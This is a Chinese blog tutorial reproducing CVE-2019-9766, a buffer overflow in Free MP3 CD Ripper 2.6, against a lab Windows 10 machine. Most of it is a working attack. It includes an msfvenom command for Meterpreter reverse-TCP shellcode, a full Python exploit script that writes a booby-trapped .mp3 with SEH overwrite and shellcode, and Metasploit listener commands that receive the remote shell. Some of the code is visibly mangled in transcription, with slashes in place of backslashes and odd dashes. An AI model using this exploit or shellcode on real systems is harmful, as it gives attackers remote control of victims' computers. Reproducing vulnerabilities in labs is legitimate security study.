CVE-2019-9766漏洞复现

这篇文章给大家介绍CVE-2019-9766漏洞复现，内容非常详细，感兴趣的小伙伴们可以参考借鉴，希望对大家能有所帮助。

      CVE-2019-9766曝出了关于Free MP3 CDRipper的缓冲区溢出漏洞，在转换文件时，Free MP3 CD Ripper 2.6中基于堆栈的缓冲区溢出漏洞，可使远程攻击者通过诱导用户打开特制的.mp3文件执行任意代码。经测试该漏洞影响多个windows版本，包括Windows7及Windows10（需指定Free MP3 CD Ripper 2.6版本）。下文将使用metasploit对CVE-2019-9766进行漏洞复现。

环境准备

攻击机：Kali(建议网卡设置改为桥接模式) IP 192.168.50.113

靶机：Windows10 IP 192.168.50.232

首先，靶机需要安装存在漏洞的Free MP3CD Ripper 2.6，版本为重点。安装好后如下图：

生成与监听

打开kali下的metasploit，生成shellcode： msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.50.113lport=2333 -f c –smallest

我们利用此shellcode去编写一个脚本，用于生成攻击payload。需要注意的是，应该使用python2版本。

buffer= "A" * 4116

NSEH= "/xeb/x06/x90/x90"

SEH= "/x84/x20/xe4/x66"

nops= "/x90" * 5

buf= ""

buf+= "/xfc/xe8/x82/x00/x00/x00/x60/x89/xe5/x31/xc0/x64/x8b/x50/x30"

buf+= "/x8b/x52/x0c/x8b/x52/x14/x8b/x72/x28/x0f/xb7/x4a/x26/x31/xff"

buf+= "/xac/x3c/x61/x7c/x02/x2c/x20/xc1/xcf/x0d/x01/xc7/xe2/xf2/x52"

buf+= "/x57/x8b/x52/x10/x8b/x4a/x3c/x8b/x4c/x11/x78/xe3/x48/x01/xd1"

buf+= "/x51/x8b/x59/x20/x01/xd3/x8b/x49/x18/xe3/x3a/x49/x8b/x34/x8b"

buf+= "/x01/xd6/x31/xff/xac/xc1/xcf/x0d/x01/xc7/x38/xe0/x75/xf6/x03"

buf+= "/x7d/xf8/x3b/x7d/x24/x75/xe4/x58/x8b/x58/x24/x01/xd3/x66/x8b"

buf+= "/x0c/x4b/x8b/x58/x1c/x01/xd3/x8b/x04/x8b/x01/xd0/x89/x44/x24"

buf+= "/x24/x5b/x5b/x61/x59/x5a/x51/xff/xe0/x5f/x5f/x5a/x8b/x12/xeb"

buf+= "/x8d/x5d/x68/x33/x32/x00/x00/x68/x77/x73/x32/x5f/x54/x68/x4c"

buf+= "/x77/x26/x07/x89/xe8/xff/xd0/xb8/x90/x01/x00/x00/x29/xc4/x54"

buf+= "/x50/x68/x29/x80/x6b/x00/xff/xd5/x6a/x0a/x68/xc0/xa8/x32/x71"

buf+= "/x68/x02/x00/x09/x1d/x89/xe6/x50/x50/x50/x50/x40/x50/x40/x50"

buf+= "/x68/xea/x0f/xdf/xe0/xff/xd5/x97/x6a/x10/x56/x57/x68/x99/xa5"

buf+= "/x74/x61/xff/xd5/x85/xc0/x74/x0a/xff/x4e/x08/x75/xec/xe8/x67"

buf+= "/x00/x00/x00/x6a/x00/x6a/x04/x56/x57/x68/x02/xd9/xc8/x5f/xff"

buf+= "/xd5/x83/xf8/x00/x7e/x36/x8b/x36/x6a/x40/x68/x00/x10/x00/x00"

buf+= "/x56/x6a/x00/x68/x58/xa4/x53/xe5/xff/xd5/x93/x53/x6a/x00/x56"

buf+= "/x53/x57/x68/x02/xd9/xc8/x5f/xff/xd5/x83/xf8/x00/x7d/x28/x58"

buf+= "/x68/x00/x40/x00/x00/x6a/x00/x50/x68/x0b/x2f/x0f/x30/xff/xd5"

buf+= "/x57/x68/x75/x6e/x4d/x61/xff/xd5/x5e/x5e/xff/x0c/x24/x0f/x85"

buf+= "/x70/xff/xff/xff/xe9/x9b/xff/xff/xff/x01/xc3/x29/xc6/x75/xc1"

buf+= "/xc3/xbb/xf0/xb5/xa2/x56/x6a/x00/x53/xff/xd5";

pad= "B" * (316 – len(nops) – len(buf) )

payload= buffer + NSEH + SEH + nops + buf +pad

try:

   f=open("TestFMCR.mp3","w")

    print "[+] Creating %s bytes mp3File…" %len(payload)

    f.write(payload)

    f.close()

    print "[+] mp3 File createdsuccessfully!"

except:

    print "File cannot be created!"

将生成的MP3文件先放至靶机，然后在攻击机中打开msf，设置攻击模块与监听（ip,端口等）

msfconsole

useexploit/multi/handler

set lhost 192.168.50.113

set lport 2333

set payload windows/meterpreter/reverse_tcp

然后开始监听：

exploit

结果

      设置好监听后，我们将准备好的MP3文件放入靶机运行。点击convert，选择文件，如果此处没有看到mp3文件的话，可能是他默认只显示.wav文件，下面改为全部文件即可。

选择好后直接选打开，程序开始读取转换文件。

运行后可能会闪退、未响应或是报错，毕竟这不是mp3文件。没有关系，我们可以看到监听那边已经有响应了。

       

不得不说CVE-2019-9766漏洞利用价值比较低，虽然是缓冲区溢出造成的远程代码执行，但利用前提是目标机安装了Free MP3 CD Ripper，且必须为2.6版本。所有，这个漏洞也非常好修复：删除这个软件，或将其更新为更高的版本。

关于CVE-2019-9766漏洞复现就分享到这里了，希望以上内容可以对大家有一定的帮助，可以学到更多知识。如果觉得文章不错，可以把它分享出去让更多的人看到。